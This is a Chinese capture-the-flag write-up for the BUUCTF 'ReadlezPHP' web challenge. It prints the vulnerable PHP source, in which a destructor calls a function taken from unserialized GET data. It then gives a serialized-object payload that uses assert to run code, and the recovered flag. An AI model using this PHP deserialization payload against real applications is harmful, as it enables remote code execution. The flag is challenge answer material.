BUUCTF——ReadlezPHP

BUUCTF------ReadlezPHP

进入靶场

看了看框架和源码信息

没有什么可以利用的地方

爆破一下目录看看

结果只出来个index.php

看了一下Findsomthing

报了个路径

复制代码
/time.php?source

拼接访问一下

出了个php代码

php 复制代码
<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

代码结构分析

  1. 类定义 - HelloPhp 类:
    • 属性 :
      • public $a
      • public $b
    • 构造函数 __construct() :
      • 初始化 $this->a = "Y-m-d h:i:s" (日期格式字符串)
      • 初始化 $this->b = "date" (PHP日期函数名)
    • 析构函数 __destruct() :
      • $this->a 赋值给 $a
      • $this->b 赋值给 $b
      • 执行 $b($a) 并输出结果 (动态函数调用)
  2. 实例化 :
    • $c = new HelloPhp 创建了一个默认的 HelloPhp 对象
  3. 源代码查看功能 :
    • 如果 GET 参数 source 存在,则显示当前文件源代码并退出
  4. 反序列化入口 :
    • @$ppp = unserialize($_GET["data"]) 从 GET 参数 data 反序列化数据

构造反序列化payload

php 复制代码
<?php
class HelloPhp
{
    public $a='phpinfo()';
    public $b='assert';

}
$c = new HelloPhp;
echo(serialize($c));

拿到反序列化代码

构造payload

复制代码
?data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

进入phpinfo 翻翻配置信息

翻到好东西了

复制代码
flag{6fcec1e0-69df-46c7-a734-22b02c305449}

直接下播!!!

相关推荐
qq_430908573 小时前
网络安全-机遇与挑战
安全
希望奇迹很安静3 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南5 小时前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao6 小时前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
安 当 加 密8 小时前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课17 小时前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻17 小时前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘
小马爱打代码17 小时前
Spring Boot 接口安全设计:接口限流、防重放攻击、签名验证
网络·spring boot·安全
北极光SD-WAN组网20 小时前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全
深圳安锐科技有限公司21 小时前
基坑渗压数据不准?选对渗压计能实现自动化精准监测吗?
安全·自动化·自动化监测·大坝监测·渗压计